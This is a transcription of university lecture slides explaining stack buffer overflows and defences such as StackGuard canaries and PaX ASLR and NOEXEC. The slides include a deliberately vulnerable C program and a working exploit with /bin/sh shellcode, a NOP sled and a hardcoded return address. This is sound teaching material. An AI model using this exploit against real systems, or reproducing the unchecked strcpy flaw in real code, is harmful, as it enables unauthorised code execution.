Buffer Overflow and Protection Technology. Department of Computer Science,

Save this PDF as:
 WORD  PNG  TXT  JPG

Size: px
Start display at page:

Download "Buffer Overflow and Protection Technology. Department of Computer Science,"

Transcription

1 Buffer Overflow and Protection Technology Department of Computer Science, Lorenzo Cavallaro Andrea Lanzi

2 Table of Contents Introduction Stack-based Buffer Overflow Buffer overflow introduction Stack and Stack Frame Calling Convention Issue, Injection and Payload execution Protection Technology Compiler-enforced protection: Stack Guard, ProPolice SSP Kernel-enforced protection: PaX

3 Introduction (1) Privacy-enhancing technologies: Anonymizer, Mixes of Chaum, Onion Routing, Crowds, Anonymous Credentials, Blind Signatures and so on... These kind of technologies try to improve the privacy of active users But there are also sensible data, that the users don't want to disclose and want them to remain private passwords, IM passwords, DB passwords in PHP/ASP applications, personal s, credit card number... Usually cryptography may help to improve this kind of users' privacy but it's not always deployable

4 Buffer overflow introduction Buffer overflow are one of the most biggest vulnerability, nowadays Writing past the end of a buffer, if properly done, may allow an attacker to execute arbitrary code running with full priviledges Robert T. Morris Jr. worm, The Internet Worm (1988), was the first public example that showed such an exploitation technique Aleph1 Smashing the Stack for fun and profit (1996) represents the first underground's paper about stack-based buffer overflow

5 The Stack (1) It's a memory data structure used by a process as storage for function's local variables and function's parameters A function Stack Frame (or Activation Record, AR) is associated at each function call. The AR usually holds function's parameters (if any) return address (RET); memory address at which start again the execution once the function is ended caller's AR memory address (it may not be there at all) function's local variables (if any)

6 The Stack (2) Abstract Data Type, Last-in First-out (LIFO) Let S be a Stack and e an element. The common stack operation are push(s,e) it inserts the element e at the top of the stack e = pop(s) it retrieves the element at the top of the stack S and update the stack pointer S = top(s) it retrieves the top of the stack S

7 The Stack (3) i386 computer architecture, Linux operating system Stack grows from high memory addresses (bottom of the stack) toward lower one (top of the stack) Write operations are performed from low memory addresses toward higher one little-endian multibyte storage in memory ESP (Extended Stack Poiner) 32 bit CPU register points always at the top of the stack EBP (Extended Base Pointer) 32 bit CPU register, also known as Frame Pointer (FP), points at the current AR (stack frame)

8 Stack Layout: function with no arguments void function(void) { int x; char buf[10]; x = 5; } memset(buf, 0, sizeof (buf)); strcpy(buf, securephd );

9 Calling Convention Convention used to build the right environment when calling a function C declaration syntax (cdecl) parameters are passed on the stack in reverse declaration order it's up to the caller to clean up the allocated stack space Standard syntax (stdcall) parameters are passed on the stack in reverse declaration order it's up to the callee to clean up the allocated stack space fast call syntax, naked...

10 Function call (1) Using the cdecl calling convention, at each function call, the generated assembly code must push on the stack the function's parameters in reverse declaration order call the function (e.g. call function_address) which semantically means push(s, return_address) jump function_address

11 Function call (2) At the very begin of every function there are few instructions, the prologue, that are executed when the function gains control push(s, EBP) EBP = ESP doing so, the function can use EBP, the frame pointer, to address local variables (using negative offsets) and to address its parameters (using positive offsets)

12 Automatic variables After prologue's execution, the function allocates space on the stack for its local variables (if any) doing explicit stack pointer operation (e.g. sub $0x10, %esp) doing implicit stack pointer operation (e.g. pushl $0x ) Automatic variables are allocates on the stack, hence usual scope rules are applied; local variables are visible only within their Activation Record they are not available once the function is terminated

13 Function termination At the very end of every function, there are few instructions, the epilogue, which are executed when the function is going to terminate. The epilogue fixes what the prologue did ESP = EBP (e.g. mov %ebp, %esp) EBP = pop(s) (e.g. popl %ebp) The function ends its execution, returning to the caller, by issuing a ret instruction which semantically corresponds to EIP = pop(s). This, in fact, retrieve the previously Saved Return Address, pushed on the stack by means of the function call

14 Stack Layout: function with arguments int main(void) { int res; } res = sum(5, 6); printf( sum is: %d\n, res); exit(0); 0x080483b3 0x080483b8 int sum(int a, int b) { return (a + b); } 0x80483da

15 Buffer Overflow (1) C strings are sequences of bytes (char arrays) nil terminated \0STRING 2\0 string 1 string 2 VERY BIG STRING\0 string 3 Copying string 3 into string 1 without checking for target boundaries, we'll get VERY BIG STRING\0G 2\0

16 Buffer Overflow (2) A buffer overflow occours when too many data are written into a buffer besides its real size, causing it to overflow Remember that stack grows toward lower memory addresses while memory write are done toward higher memory addresses Stack holds sensible information, besides local data, such as the Saved Return Address (SRET) What happen if we can cause a buffer to overflow, in order to overwrite important informations, such as SRET, stored on the stack?

17 Buffer Overflow (3) At function termination, after the epilogue, the ret (0xc3) assembly instruction is executed If, exploiting a buffer overflow vulnerability, the SRET gets overwritten, the attacker gain control of the EIP register which manages the process execution flow Once EIP is subverted, it remains to choose where to hijack this flow to Usually the hijacked execution flow is redirected to a code written and injected by the attacker. This code is called payload (shellcode, egg,...)

18 Injection (1) Talking about buffer overflow usually implies talking about injection vector and payload The injection vector is the ad hoc built vector which will be sent to the vulnerable process. It may holds payload's address payload... The payload is the code the attacker wants to execute Both the injection vector and the payload are architecture and OS dependent

19 Payload execution Direct jump payload's address guessing addresses may contains nil bytes payload's address may change (security patches such as PaX ASLR) issue about target vulnerable buffer size Payload stored in the vulnerable process environment Pop return Call register Push return

20 No Operation Assembly instruction that execute no operation (0x90) Combined with Direct jump, increases the error percentage the attacker may do, while guessing the payload's memory address With NOP, the jump may allow to fall down on a landing area Usually the injection vector looks like NOP..NOP PAYLOAD RETADDR..RETADDR

21 Advanced techniques (overview) Off-by-one (SFP LSB overwrite) stack function pointer overwriting heap overflow (free/malloc chunk overwriting) advanced payload IDS evasion alfanumericl polymorphic crypted

22 Example: vuln.c (1) int main(void) { char buf[512]; int done = 0; while (!done) { memset(buf, 0, sizeof (buf)); read(0, buf, sizeof (buf) 1); buf[strlen(buf 1)] = 0; } done = vuln(buf); } exit(0);

23 Example: vuln.c (2) int vuln(char *s) { char small[128]; memset(small, 0, sizeof (small)); if (!strncmp(s, exit, 4)) return 1; strcpy(small, s); printf( [+] small); printf( [+] small: %s\n, small); } return 0;

24 Example: vuln execution (1) $./vuln Buffer Overflow [+] [+] small: Buffer Overflow exit $ perl -e '{ print A x 160 }'./vuln [+] [+] small: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAA zsh: 3477 done perl -e '{ print "A" x 160 }' zsh: 3478 segmentation fault (core dumped)./vuln

25 Example: vuln execution (2) $ gdb -q -c core Core was generated by `./vuln'. Program terminated with signal 11, Segmentation fault. #0 0x in?? () (gdb) info reg eip eip 0x x (gdb) quit $ (./x ; cat)./vuln [+] [+] small: (garbage)... id uid=1000(sullivan) gid=100(users)...

26 Exploit (1) #include <stdio.h> #define RETADDR 0xbffff8a0 #define NOP 0x90 unsigned char shellcode[] = "\xeb\x15\x5b\x31\xc0\x89\x5b\x08\x89\x43\x0c \x88\x43\x07\x89\xc2\x8d\x4b\x08\xb0\x0b\xcd \x80\xe8\xe6\xff\xff\xff/bin/sh"; int main(void) { char buf[160]; int i; char *p; /* zero out buffer */ memset(buf, 0, sizeof (buf));

27 Exploit (2) /* * Fill with the return address, the address at which we want to jump to, * the address at which the vulnearabile buffer is stored and that we have * filled with NOP..NOP, shellcode, RETADDR..RETADDR... hence with our * payload too */ for (i = 0; i < sizeof (buf); i += 4) *(unsigned int *)(buf + i) = RETADDR; /* * Fill the buffer with 20 byte of NOP even if we don't need it * since you already know at which address will be our payload (in the * injected vector): it's the vuln program that prints this for us */ memset(buf, NOP, 20);...

28 Exploit (3) /* * after follow our paylod that we want to execute, our shellcode. */ p = (buf + 20); for (i = 0; i < strlen(shellcode); i++) p[i] = shellcode[i]; buf[sizeof(buf) - 1] = 0; printf("%s\n", buf); }

29 Protection Technology Buffer overflows issue may be solved in different ways in order to prevent execution flow hijacking and arbitrary code execution There are two main categories to this purpose: Compiler-enforced protection (e.g. Stack Guard) Compilers have complete knowledge about the structure of the binary so they can modify the program's stack layout in order to prevent, or at least detect and stop, buffer overflows Kernel-enforced protection (e.g. Grsecurity, PaX) The kernel cannot modify the program's stack layout since it doesn't know anything about it, but it has a complete knowledge of a process' virtual address space layout so it can apply access controls to pages of memory in order to prevent execution of arbitrary code

30 Stack Guard (1) Stack Guard is a compiler-enforced protection technology Implemented in the GNU C compiler, stops stack-based buffer overflow vulnerabilities introducing just a little performance cost Integrity check on the Activation Records it detects control information (SRET) overwriting Issue with this solution: the attacker may choose to execute payload already in memory (or injected in other places) As safeguard measure, a canary location is inserted before the sensible control information on the stack

31 Stack Guard (2) Canary value should be both hard to detect and to spoof by an attacker The canary location is initialized just after having saved the control informations on the stack, i.e. after the prologue is executed The canary location is checked up just before restoring the control information, i.e. before the epilogue is executed This way the control information are protected since its values is checked up just before they gets restored

32 Stack Guard (3) There are four types of stack canaries: NULL canary, introduced by der Mouse, consists of a 0x value. Terminator canary, detect strings overflow but it has a known value: CR, LF, NULL, -1. Since many functions that manages strings use those terminators as string terminator, it shouldn't be possible to write past the end of the vulnerable buffers All functions that write to memory without directly managing strings, such as memcpy(3), may bypass these canaries

33 Stack Guard (4) Random canary can detects all memory writes that are not able to guess this canary value defeating, hence, the buffer overflow issue Usually the canary is a global variable initialized at program startup. The attacker should be able to guess this value in order to be successful in the exploitation of the vulnerability Random XOR canary acts like random canary but it adds an integrity check to the protected control information, by perform an XOR operation between the canary and those information, storing the result in the canary location

34 PaX PaX is a kernel-enforced protection technology It offers prevention against abritrary code execution via memory management access controls, NOEXEC address space layout randomization, ASLR It's embedded by Grsecurity Linux kernel patch which also offers read-only sys_call_table, IDT and GDT /dev/kmem, /dev/mem and /dev/port protections /proc, and chroot(2) restrictions Trusted Path Execution, psuedo-random PID, IP ID, TCP ISN and TCP source ports, socket creation restrictions

35 PaX NOEXEC It aims to prevent the injection and execution of arbitrary code into a process' address space It makes all the memory that holds stack, heap, data and anonymous mappings area non-executable There are two approaches on IA-32 architecture PAGEEXEC which uses the paging logic of the CPU SEGMEXEC which uses the segmentation logic of the CPU Since page protection rights originate from mmap(2) syscall and they can be changed by mprotect(2), it exists also MPROTECT feature, in order to enforce this protection

36 PaX ASLR (1) Address Space Layout Randomization attempts to render exploits that depends on fixed addresses useless It introduces a small amount of randomness to the layout of the process' virtual memory space There are several memory areas that need this randomness RANDUSTACK it randomizes the user land stack addresses; it's the kernel that create the process' stack layout RANDKSTACK it randomizes the kernel land stack addresses associated to each task structure

37 PaX ASLR (2) RANDMMAP it handles the randomization of all file and anonymous memory mappings (mmap(2), brk(2)) RANDEXEC it randomizes the location of ET_EXEC ELF binaries. it loads the executable at the standard address which lies into non-executable pages an executable copy of the binary is created at a random location using the RANDMMAP features execution attempts flow back into the randomized mapping via a page fault handler if the non-executable page is accessed instead of the randomly relocated image

Lecture 08 Control-flow Hijacking Defenses

Lecture 08 Control-flow Hijacking Defenses Lecture 08 Control-flow Hijacking Defenses Stephen Checkoway University of Illinois at Chicago CS 487 Fall 2017 Slides adapted from Miller, Bailey, and Brumley Control Flow Hijack: Always control + computation

More information

Exploiting Stack Buffer Overflows Learning how blackhats smash the stack for fun and profit so we can prevent it

Exploiting Stack Buffer Overflows Learning how blackhats smash the stack for fun and profit so we can prevent it Exploiting Stack Buffer Overflows Learning how blackhats smash the stack for fun and profit so we can prevent it 29.11.2012 Secure Software Engineering Andreas Follner 1 Andreas Follner Graduated earlier

More information

2 Sadeghi, Davi TU Darmstadt 2012 Secure, Trusted, and Trustworthy Computing Chapter 6: Runtime Attacks

2 Sadeghi, Davi TU Darmstadt 2012 Secure, Trusted, and Trustworthy Computing Chapter 6: Runtime Attacks Runtime attacks are major threats to today's applications Control-flow of an application is compromised at runtime Typically, runtime attacks include injection of malicious code Reasons for runtime attacks

More information

Stack -- Memory which holds register contents. Will keep the EIP of the next address after the call

Stack -- Memory which holds register contents. Will keep the EIP of the next address after the call Call without Parameter Value Transfer What are involved? ESP Stack Pointer Register Grows by 4 for EIP (return address) storage Stack -- Memory which holds register contents Will keep the EIP of the next

More information

CSC 2400: Computing Systems. X86 Assembly: Function Calls"

CSC 2400: Computing Systems. X86 Assembly: Function Calls CSC 24: Computing Systems X86 Assembly: Function Calls" 1 Lecture Goals! Challenges of supporting functions" Providing information for the called function" Function arguments and local variables" Allowing

More information

CS 645: Lecture 3 Software Vulnerabilities. Rachel Greenstadt July 3, 2013

CS 645: Lecture 3 Software Vulnerabilities. Rachel Greenstadt July 3, 2013 CS 645: Lecture 3 Software Vulnerabilities Rachel Greenstadt July 3, 2013 Project 1: Software exploits Individual project - done in virtual machine environment This assignment is hard. Don t leave it until

More information

x86 assembly CS449 Fall 2017

x86 assembly CS449 Fall 2017 x86 assembly CS449 Fall 2017 x86 is a CISC CISC (Complex Instruction Set Computer) e.g. x86 Hundreds of (complex) instructions Only a handful of registers RISC (Reduced Instruction Set Computer) e.g. MIPS

More information

Betriebssysteme und Sicherheit Sicherheit. Buffer Overflows

Betriebssysteme und Sicherheit Sicherheit. Buffer Overflows Betriebssysteme und Sicherheit Sicherheit Buffer Overflows Software Vulnerabilities Implementation error Input validation Attacker-supplied input can lead to Corruption Code execution... Even remote exploitation

More information

BUFFER OVERFLOW DEFENSES & COUNTERMEASURES

BUFFER OVERFLOW DEFENSES & COUNTERMEASURES BUFFER OVERFLOW DEFENSES & COUNTERMEASURES CMSC 414 FEB 01 2018 RECALL OUR CHALLENGES How can we make these even more difficult? Putting code into the memory (no zeroes) Finding the return address (guess

More information

Introduction to Computer Systems , fall th Lecture, Sep. 28 th

Introduction to Computer Systems , fall th Lecture, Sep. 28 th Introduction to Computer Systems 15 213, fall 2009 9 th Lecture, Sep. 28 th Instructors: Majd Sakr and Khaled Harras Last Time: Structures struct rec { int i; int a[3]; int *p; }; Memory Layout i a p 0

More information

Advanced Buffer Overflow

Advanced Buffer Overflow Pattern Recognition and Applications Lab Advanced Buffer Overflow Ing. Davide Maiorca, Ph.D. davide.maiorca@diee.unica.it Computer Security A.Y. 2016/2017 Department of Electrical and Electronic Engineering

More information

CSC 2400: Computing Systems. X86 Assembly: Function Calls

CSC 2400: Computing Systems. X86 Assembly: Function Calls CSC 24: Computing Systems X86 Assembly: Function Calls 1 Lecture Goals Challenges of supporting functions Providing information for the called function Function arguments and local variables Allowing the

More information

Software Vulnerabilities. Jeff Foster University of Maryland, College Park

Software Vulnerabilities. Jeff Foster University of Maryland, College Park Software Vulnerabilities Jeff Foster University of Maryland, College Park When is a Program Secure? When it does exactly what it should! But what is it supposed to do? - Someone tells us (do we trust them?)

More information

String Oriented Programming Exploring Format String Attacks. Mathias Payer

String Oriented Programming Exploring Format String Attacks. Mathias Payer String Oriented Programming Exploring Format String Attacks Mathias Payer Motivation Additional protection mechanisms prevent many existing attack vectors Format string exploits are often overlooked Drawback:

More information

Software Vulnerabilities August 31, 2011 / CS261 Computer Security

Software Vulnerabilities August 31, 2011 / CS261 Computer Security Software Vulnerabilities August 31, 2011 / CS261 Computer Security Software Vulnerabilities...1 Review paper discussion...2 Trampolining...2 Heap smashing...2 malloc/free...2 Double freeing...4 Defenses...5

More information

CSE 509: Computer Security

CSE 509: Computer Security CSE 509: Computer Security Date: 2.16.2009 BUFFER OVERFLOWS: input data Server running a daemon Attacker Code The attacker sends data to the daemon process running at the server side and could thus trigger

More information

Selected background on ARM registers, stack layout, and calling convention

Selected background on ARM registers, stack layout, and calling convention Selected background on ARM registers, stack layout, and calling convention ARM Overview ARM stands for Advanced RISC Machine Main application area: Mobile phones, smartphones (Apple iphone, Google Android),

More information

Runtime Defenses against Memory Corruption

Runtime Defenses against Memory Corruption CS 380S Runtime Defenses against Memory Corruption Vitaly Shmatikov slide 1 Reading Assignment Cowan et al. Buffer overflows: Attacks and defenses for the vulnerability of the decade (DISCEX 2000). Avijit,

More information

Architecture-level Security Vulnerabilities

Architecture-level Security Vulnerabilities Architecture-level Security Vulnerabilities Björn Döbel Outline How stacks work Smashing the stack for fun and profit Preventing stack smashing attacks Circumventing stack smashing prevention The Battlefield:

More information

Topics in Software Security Vulnerability

Topics in Software Security Vulnerability Topics in Software Security Vulnerability Software vulnerability What are software vulnerabilities? Types of vulnerabilities E.g., Buffer Overflows How to find these vulnerabilities and prevent them? Classes

More information

Program Security and Vulnerabilities Class 2

Program Security and Vulnerabilities Class 2 Program Security and Vulnerabilities Class 2 CEN-5079: 28.August.2017 1 Secure Programs Programs Operating System Device Drivers Network Software (TCP stack, web servers ) Database Management Systems Integrity

More information

SYSTEM CALL IMPLEMENTATION. CS124 Operating Systems Fall , Lecture 14

SYSTEM CALL IMPLEMENTATION. CS124 Operating Systems Fall , Lecture 14 SYSTEM CALL IMPLEMENTATION CS124 Operating Systems Fall 2017-2018, Lecture 14 2 User Processes and System Calls Previously stated that user applications interact with the kernel via system calls Typically

More information

1/31/2007 C. Edward Chow. CS591 Page 1

1/31/2007 C. Edward Chow. CS591 Page 1 Page 1 History of Buffer Overflow Attacks Buffer Overflow Attack and related Background Knowledge Linux VirtualMemory Map Shellcode Egg: No-ops/shellcode/returnAddresses Countermeasures: StackGuard StackShield

More information

CSE 127: Computer Security. Memory Integrity. Kirill Levchenko

CSE 127: Computer Security. Memory Integrity. Kirill Levchenko CSE 127: Computer Security Memory Integrity Kirill Levchenko November 18, 2014 Stack Buffer Overflow Stack buffer overflow: writing past end of a stackallocated buffer Also called stack smashing One of

More information

Buffer. This time. Security. overflows. Software. By investigating. We will begin. our 1st section: History. Memory layouts

Buffer. This time. Security. overflows. Software. By investigating. We will begin. our 1st section: History. Memory layouts This time We will begin our 1st section: Software Security By investigating Buffer overflows and other memory safety vulnerabilities History Memory layouts Buffer overflow fundamentals Software security

More information

Buffer Overflow Vulnerability

Buffer Overflow Vulnerability Buffer Overflow Vulnerability 1 Buffer Overflow Vulnerability Copyright c 2006 2014 Wenliang Du, Syracuse University. The development of this document is/was funded by three grants from the US National

More information

Buffer Overflow Attack

Buffer Overflow Attack Chapter 4 This is a sample chapter in the book titled "Computer Security: A Hands-on Approach" authored by Wenliang Du. Buffer Overflow Attack From Morris worm in 1988, Code Red worm in 2001, SQL Slammer

More information

Protection and System Calls. Otto J. Anshus

Protection and System Calls. Otto J. Anshus Protection and System Calls Otto J. Anshus Protection Issues CPU protection Prevent a user from using the CPU for too long Throughput of jobs, and response time to events (incl. user interactive response

More information

Secure Programming I. Steven M. Bellovin September 28,

Secure Programming I. Steven M. Bellovin September 28, Secure Programming I Steven M. Bellovin September 28, 2014 1 If our software is buggy, what does that say about its security? Robert H. Morris Steven M. Bellovin September 28, 2014 2 The Heart of the Problem

More information

Secure Software Development: Theory and Practice

Secure Software Development: Theory and Practice Secure Software Development: Theory and Practice Suman Jana MW 2:40-3:55pm 415 Schapiro [SCEP] *Some slides are borrowed from Dan Boneh and John Mitchell Software Security is a major problem! Why writing

More information

Changelog. Corrections made in this version not in first posting: 1 April 2017: slide 13: a few more %c s would be needed to skip format string part

Changelog. Corrections made in this version not in first posting: 1 April 2017: slide 13: a few more %c s would be needed to skip format string part 1 Changelog 1 Corrections made in this version not in first posting: 1 April 2017: slide 13: a few more %c s would be needed to skip format string part OVER questions? 2 last time 3 memory management problems

More information

A process. the stack

A process. the stack A process Processes Johan Montelius What is a process?... a computation KTH 2017 a program i.e. a sequence of operations a set of data structures a set of registers means to interact with other processes

More information

Assembly Language: Function Calls. Goals of this Lecture. Function Call Problems

Assembly Language: Function Calls. Goals of this Lecture. Function Call Problems Assembly Language: Function Calls 1 Goals of this Lecture Help you learn: Function call problems: Calling and urning Passing parameters Storing local variables Handling registers without interference Returning

More information

PaX (http://pageexec.virtualave.net) The Guaranteed End of Arbitrary Code Execution

PaX (http://pageexec.virtualave.net) The Guaranteed End of Arbitrary Code Execution PaX (http://pageexec.virtualave.net) The Guaranteed End of Arbitrary Code Execution Who am I? Brad Spengler The only grsecurity developer NOT a PaX developer Computer Engineering major, Mathematics minor

More information

CSE 127: Computer Security Control Flow Hijacking. Kirill Levchenko

CSE 127: Computer Security Control Flow Hijacking. Kirill Levchenko CSE 127: Computer Security Control Flow Hijacking Kirill Levchenko October 17, 2017 Control Flow Hijacking Defenses Avoid unsafe functions Stack canary Separate control stack Address Space Layout Randomization

More information

Buffer Overflow. Jin-Soo Kim Computer Systems Laboratory Sungkyunkwan University

Buffer Overflow. Jin-Soo Kim Computer Systems Laboratory Sungkyunkwan University Buffer Overflow Jin-Soo Kim (jinsookim@skku.edu) Computer Systems Laboratory Sungkyunkwan University http://csl.skku.edu IA-32/Linux Memory Layout Runtime stack (8MB limit) Heap Dynamically allocated storage

More information

An Experience Like No Other. Stack Discipline Aug. 30, 2006

An Experience Like No Other. Stack Discipline Aug. 30, 2006 15-410 An Experience Like No Other Discipline Aug. 30, 2006 Bruce Maggs Dave Eckhardt Slides originally stolen from 15-213 15-410, F 06 Synchronization Registration If you're here but not registered, please

More information

Hacking Blind BROP. Presented by: Brooke Stinnett. Article written by: Andrea Bittau, Adam Belay, Ali Mashtizadeh, David Mazie`res, Dan Boneh

Hacking Blind BROP. Presented by: Brooke Stinnett. Article written by: Andrea Bittau, Adam Belay, Ali Mashtizadeh, David Mazie`res, Dan Boneh Hacking Blind BROP Presented by: Brooke Stinnett Article written by: Andrea Bittau, Adam Belay, Ali Mashtizadeh, David Mazie`res, Dan Boneh Overview Objectives Introduction to BROP ROP recap BROP key phases

More information

Stack-Based Buffer Overflow Explained. Marc Koser. East Carolina University. ICTN 4040: Enterprise Information Security

Stack-Based Buffer Overflow Explained. Marc Koser. East Carolina University. ICTN 4040: Enterprise Information Security Running Head: BUFFER OVERFLOW 1 Stack-Based Buffer Overflow Explained Marc Koser East Carolina University ICTN 4040: Enterprise Information Security Instructor: Dr. Philip Lunsford 03-17-2015 Prepared

More information

New York University CSCI-UA : Advanced Computer Systems: Spring 2016 Midterm Exam

New York University CSCI-UA : Advanced Computer Systems: Spring 2016 Midterm Exam New York University CSCI-UA.480-008: Advanced Computer Systems: Spring 2016 Midterm Exam This exam is 75 minutes. Stop writing when time is called. You must turn in your exam; we will not collect it. Do

More information

CPSC 213. Introduction to Computer Systems. Procedures and the Stack. Unit 1e

CPSC 213. Introduction to Computer Systems. Procedures and the Stack. Unit 1e CPSC 213 Introduction to Computer Systems Unit 1e Procedures and the Stack 1 Readings for Next 3 Lectures Textbook Procedures - 3.7 Out-of-Bounds Memory References and Buffer Overflow - 3.12 2 Local Variables

More information

The Geometry of Innocent Flesh on the Bone

The Geometry of Innocent Flesh on the Bone The Geometry of Innocent Flesh on the Bone Return-into-libc without Function Calls (on the x86) Hovav Shacham hovav@cs.ucsd.edu CCS 07 Technical Background Gadget: a short instructions sequence (e.x. pop

More information

Sistemi Operativi. Lez. 16 Elementi del linguaggio Assembler AT&T

Sistemi Operativi. Lez. 16 Elementi del linguaggio Assembler AT&T Sistemi Operativi Lez. 16 Elementi del linguaggio Assembler AT&T Data Sizes Three main data sizes Byte (b): 1 byte Word (w): 2 bytes Long (l): 4 bytes Separate assembly-language instructions E.g., addb,

More information

Implementing Procedure Calls

Implementing Procedure Calls 1 / 39 Implementing Procedure Calls February 18 22, 2013 2 / 39 Outline Intro to procedure calls Caller vs. callee Procedure call basics Calling conventions The stack Interacting with the stack Structure

More information

Lecture 6: Buffer Overflow. CS 436/636/736 Spring Nitesh Saxena

Lecture 6: Buffer Overflow. CS 436/636/736 Spring Nitesh Saxena Lecture 6: Buffer Overflow CS 436/636/736 Spring 2016 Nitesh Saxena *Adopted from a previous lecture by Aleph One (Smashing the Stack for Fun and Profit) HW3 submitted Course Admin Being graded Solution

More information

See P&H 2.8 and 2.12, and A.5-6. Prof. Hakim Weatherspoon CS 3410, Spring 2015 Computer Science Cornell University

See P&H 2.8 and 2.12, and A.5-6. Prof. Hakim Weatherspoon CS 3410, Spring 2015 Computer Science Cornell University See P&H 2.8 and 2.12, and A.5-6 Prof. Hakim Weatherspoon CS 3410, Spring 2015 Computer Science Cornell University Upcoming agenda PA1 due yesterday PA2 available and discussed during lab section this week

More information

CMSC 313 COMPUTER ORGANIZATION & ASSEMBLY LANGUAGE PROGRAMMING

CMSC 313 COMPUTER ORGANIZATION & ASSEMBLY LANGUAGE PROGRAMMING CMSC 313 COMPUTER ORGANIZATION & ASSEMBLY LANGUAGE PROGRAMMING LECTURE 16, SPRING 2013 TOPICS TODAY Project 6 Perils & Pitfalls of Memory Allocation C Function Call Conventions in Assembly Language PERILS

More information

Winter Compiler Construction T11 Activation records + Introduction to x86 assembly. Today. Tips for PA4. Today:

Winter Compiler Construction T11 Activation records + Introduction to x86 assembly. Today. Tips for PA4. Today: Winter 2006-2007 Compiler Construction T11 Activation records + Introduction to x86 assembly Mooly Sagiv and Roman Manevich School of Computer Science Tel-Aviv University Today ic IC Language Lexical Analysis

More information

United States Naval Academy Electrical and Computer Engineering Department EC310-6 Week Midterm Spring AY2017

United States Naval Academy Electrical and Computer Engineering Department EC310-6 Week Midterm Spring AY2017 United States Naval Academy Electrical and Computer Engineering Department EC310-6 Week Midterm Spring AY2017 1. Do a page check: you should have 8 pages including this cover sheet. 2. You have 50 minutes

More information

Buffer Overflow. Jin-Soo Kim Computer Systems Laboratory Sungkyunkwan University

Buffer Overflow. Jin-Soo Kim Computer Systems Laboratory Sungkyunkwan University Buffer Overflow Jin-Soo Kim (jinsookim@skku.edu) Computer Systems Laboratory Sungkyunkwan University http://csl.skku.edu x86-64/linux Memory Layout Stack Runtime stack (8MB limit) Heap Dynamically allocated

More information

Ethical Hacking: Preventing & Writing Buffer Overflow Exploits

Ethical Hacking: Preventing & Writing Buffer Overflow Exploits Ethical Hacking: Preventing & Writing Buffer Overflow Exploits Rochester Security Summit 2014 Rochester OWASP Chapter Lead Ralph Durkee - Durkee Consulting, Inc. info@rd1.net Ralph Durkee Background Founder

More information

Processes (Intro) Yannis Smaragdakis, U. Athens

Processes (Intro) Yannis Smaragdakis, U. Athens Processes (Intro) Yannis Smaragdakis, U. Athens Process: CPU Virtualization Process = Program, instantiated has memory, code, current state What kind of memory do we have? registers + address space Let's

More information

Reverse Engineering Low Level Software. CS5375 Software Reverse Engineering Dr. Jaime C. Acosta

Reverse Engineering Low Level Software. CS5375 Software Reverse Engineering Dr. Jaime C. Acosta 1 Reverse Engineering Low Level Software CS5375 Software Reverse Engineering Dr. Jaime C. Acosta Machine code 2 3 Machine code Assembly compile Machine Code disassemble 4 Machine code Assembly compile

More information

Topics. What is a Buffer Overflow? Buffer Overflows

Topics. What is a Buffer Overflow? Buffer Overflows Buffer Overflows CSC 482/582: Computer Security Slide #1 Topics 1. What is a Buffer Overflow? 2. The Most Common Implementation Flaw. 3. Process Memory Layout. 4. The Stack and C s Calling Convention.

More information

143A: Principles of Operating Systems. Lecture 5: Calling conventions. Anton Burtsev January, 2017

143A: Principles of Operating Systems. Lecture 5: Calling conventions. Anton Burtsev January, 2017 143A: Principles of Operating Systems Lecture 5: Calling conventions Anton Burtsev January, 2017 Stack and procedure calls Stack Main purpose: Store the return address for the current procedure Caller

More information

Stacks and Frames Demystified. CSCI 3753 Operating Systems Spring 2005 Prof. Rick Han

Stacks and Frames Demystified. CSCI 3753 Operating Systems Spring 2005 Prof. Rick Han s and Frames Demystified CSCI 3753 Operating Systems Spring 2005 Prof. Rick Han Announcements Homework Set #2 due Friday at 11 am - extension Program Assignment #1 due Tuesday Feb. 15 at 11 am - note extension

More information

Computer Systems Lecture 9

Computer Systems Lecture 9 Computer Systems Lecture 9 CPU Registers in x86 CPU status flags EFLAG: The Flag register holds the CPU status flags The status flags are separate bits in EFLAG where information on important conditions

More information

About unchecked management SMM & UEFI. Vulnerability. Patch. Conclusion. Bruno Pujos. July 16, Bruno Pujos

About unchecked management SMM & UEFI. Vulnerability. Patch. Conclusion. Bruno Pujos. July 16, Bruno Pujos July 16, 2016 1/45 Whoami RE, vulnerability research LSE 2015 Sogeti since 2/45 1 2 Reverse Exploitation 3 4 3/45 Agenda 1 4/45 Agenda 1 5/45 Unified Extended FIrmware is based on EFI Specification for

More information

Stack Vulnerabilities. CS4379/5375 System Security Assurance Dr. Jaime C. Acosta

Stack Vulnerabilities. CS4379/5375 System Security Assurance Dr. Jaime C. Acosta 1 Stack Vulnerabilities CS4379/5375 System Security Assurance Dr. Jaime C. Acosta Part 1 2 3 An Old, yet Still Valid Vulnerability Buffer/Stack Overflow ESP Unknown Data (unused) Unknown Data (unused)

More information

CS429: Computer Organization and Architecture

CS429: Computer Organization and Architecture CS429: Computer Organization and Architecture Warren Hunt, Jr. and Bill Young Department of Computer Sciences University of Texas at Austin Last updated: October 1, 2014 at 12:03 CS429 Slideset 6: 1 Topics

More information

Hands-on Ethical Hacking: Preventing & Writing Buffer Overflow Exploits

Hands-on Ethical Hacking: Preventing & Writing Buffer Overflow Exploits Hands-on Ethical Hacking: Preventing & Writing Buffer Overflow Exploits OWASP AppSec 2013 Rochester OWASP Chapter Lead Ralph Durkee - Durkee Consulting, Inc. info@rd1.net Hands-on Ethical Hacking: Preventing

More information

Buffer Overflows. Buffer Overflow. Many of the following slides are based on those from

Buffer Overflows. Buffer Overflow. Many of the following slides are based on those from s Many of the following slides are based on those from 1 Complete Powerpoint Lecture Notes for Computer Systems: A Programmer's Perspective (CS:APP) Randal E. Bryant and David R. O'Hallaron http://csapp.cs.cmu.edu/public/lectures.html

More information

Syed Kamran Haider Department of Electrical & Computer Engineering University of Connecticut

Syed Kamran Haider Department of Electrical & Computer Engineering University of Connecticut CSE 5095 & ECE 6095 Spring 2016 Instructor Marten van Dijk System Security Lecture 1 Buffer Overflows Syed Kamran Haider Department of Electrical & Computer Engineering University of Connecticut Email:

More information

Do-While Example. In C++ In assembly language. do { z--; while (a == b); z = b; loop: addi $s2, $s2, -1 beq $s0, $s1, loop or $s2, $s1, $zero

